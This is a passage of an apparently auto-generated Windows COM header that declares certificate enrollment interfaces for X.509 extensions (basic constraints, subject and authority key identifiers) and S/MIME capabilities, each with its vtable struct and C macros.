            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionBasicConstraints * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ VARIANT_BOOL IsCA,
            /* [in] */ LONG PathLenConstraint);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsCA )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PathLenConstraint )( 
            __RPC__in IX509ExtensionBasicConstraints * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } IX509ExtensionBasicConstraintsVtbl;

    interface IX509ExtensionBasicConstraints
    {
        CONST_VTBL struct IX509ExtensionBasicConstraintsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionBasicConstraints_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionBasicConstraints_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionBasicConstraints_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionBasicConstraints_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionBasicConstraints_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionBasicConstraints_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionBasicConstraints_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionBasicConstraints_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionBasicConstraints_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionBasicConstraints_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionBasicConstraints_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionBasicConstraints_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionBasicConstraints_InitializeEncode(This,IsCA,PathLenConstraint)	\
    ( (This)->lpVtbl -> InitializeEncode(This,IsCA,PathLenConstraint) ) 

#define IX509ExtensionBasicConstraints_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionBasicConstraints_get_IsCA(This,pValue)	\
    ( (This)->lpVtbl -> get_IsCA(This,pValue) ) 

#define IX509ExtensionBasicConstraints_get_PathLenConstraint(This,pValue)	\
    ( (This)->lpVtbl -> get_PathLenConstraint(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionBasicConstraints_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionSubjectKeyIdentifier_INTERFACE_DEFINED__
#define __IX509ExtensionSubjectKeyIdentifier_INTERFACE_DEFINED__

/* interface IX509ExtensionSubjectKeyIdentifier */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionSubjectKeyIdentifier;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab317-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionSubjectKeyIdentifier : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SubjectKeyIdentifier( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionSubjectKeyIdentifierVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SubjectKeyIdentifier )( 
            __RPC__in IX509ExtensionSubjectKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509ExtensionSubjectKeyIdentifierVtbl;

    interface IX509ExtensionSubjectKeyIdentifier
    {
        CONST_VTBL struct IX509ExtensionSubjectKeyIdentifierVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionSubjectKeyIdentifier_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionSubjectKeyIdentifier_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionSubjectKeyIdentifier_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionSubjectKeyIdentifier_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionSubjectKeyIdentifier_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionSubjectKeyIdentifier_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionSubjectKeyIdentifier_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionSubjectKeyIdentifier_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionSubjectKeyIdentifier_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionSubjectKeyIdentifier_InitializeEncode(This,Encoding,strKeyIdentifier)	\
    ( (This)->lpVtbl -> InitializeEncode(This,Encoding,strKeyIdentifier) ) 

#define IX509ExtensionSubjectKeyIdentifier_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionSubjectKeyIdentifier_get_SubjectKeyIdentifier(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SubjectKeyIdentifier(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionSubjectKeyIdentifier_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionAuthorityKeyIdentifier_INTERFACE_DEFINED__
#define __IX509ExtensionAuthorityKeyIdentifier_INTERFACE_DEFINED__

/* interface IX509ExtensionAuthorityKeyIdentifier */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionAuthorityKeyIdentifier;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab318-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionAuthorityKeyIdentifier : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AuthorityKeyIdentifier( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionAuthorityKeyIdentifierVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strKeyIdentifier);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AuthorityKeyIdentifier )( 
            __RPC__in IX509ExtensionAuthorityKeyIdentifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509ExtensionAuthorityKeyIdentifierVtbl;

    interface IX509ExtensionAuthorityKeyIdentifier
    {
        CONST_VTBL struct IX509ExtensionAuthorityKeyIdentifierVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionAuthorityKeyIdentifier_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionAuthorityKeyIdentifier_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionAuthorityKeyIdentifier_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionAuthorityKeyIdentifier_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionAuthorityKeyIdentifier_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionAuthorityKeyIdentifier_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionAuthorityKeyIdentifier_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionAuthorityKeyIdentifier_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionAuthorityKeyIdentifier_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionAuthorityKeyIdentifier_InitializeEncode(This,Encoding,strKeyIdentifier)	\
    ( (This)->lpVtbl -> InitializeEncode(This,Encoding,strKeyIdentifier) ) 

#define IX509ExtensionAuthorityKeyIdentifier_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_AuthorityKeyIdentifier(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_AuthorityKeyIdentifier(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionAuthorityKeyIdentifier_INTERFACE_DEFINED__ */


#ifndef __ISmimeCapability_INTERFACE_DEFINED__
#define __ISmimeCapability_INTERFACE_DEFINED__

/* interface ISmimeCapability */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISmimeCapability;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab319-217d-11da-b2a4-000e7bbb2b09")
    ISmimeCapability : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ LONG BitCount) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BitCount( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ISmimeCapabilityVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISmimeCapability * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISmimeCapability * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISmimeCapability * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISmimeCapability * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ LONG BitCount);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in ISmimeCapability * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BitCount )( 
            __RPC__in ISmimeCapability * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } ISmimeCapabilityVtbl;

    interface ISmimeCapability
    {
        CONST_VTBL struct ISmimeCapabilityVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISmimeCapability_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISmimeCapability_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISmimeCapability_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISmimeCapability_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISmimeCapability_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISmimeCapability_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISmimeCapability_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISmimeCapability_Initialize(This,pObjectId,BitCount)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,BitCount) ) 

#define ISmimeCapability_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define ISmimeCapability_get_BitCount(This,pValue)	\
    ( (This)->lpVtbl -> get_BitCount(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISmimeCapability_INTERFACE_DEFINED__ */


#ifndef __ISmimeCapabilities_INTERFACE_DEFINED__
#define __ISmimeCapabilities_INTERFACE_DEFINED__

/* interface ISmimeCapabilities */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISmimeCapabilities;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31a-217d-11da-b2a4-000e7bbb2b09")
    ISmimeCapabilities : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapability **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ISmimeCapability *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddFromCsp( 
            /* [in] */ __RPC__in_opt ICspInformation *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddAvailableSmimeCapabilities( 
            /* [in] */ VARIANT_BOOL MachineContext) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ISmimeCapabilitiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISmimeCapabilities * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISmimeCapabilities * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISmimeCapabilities * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISmimeCapabilities * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
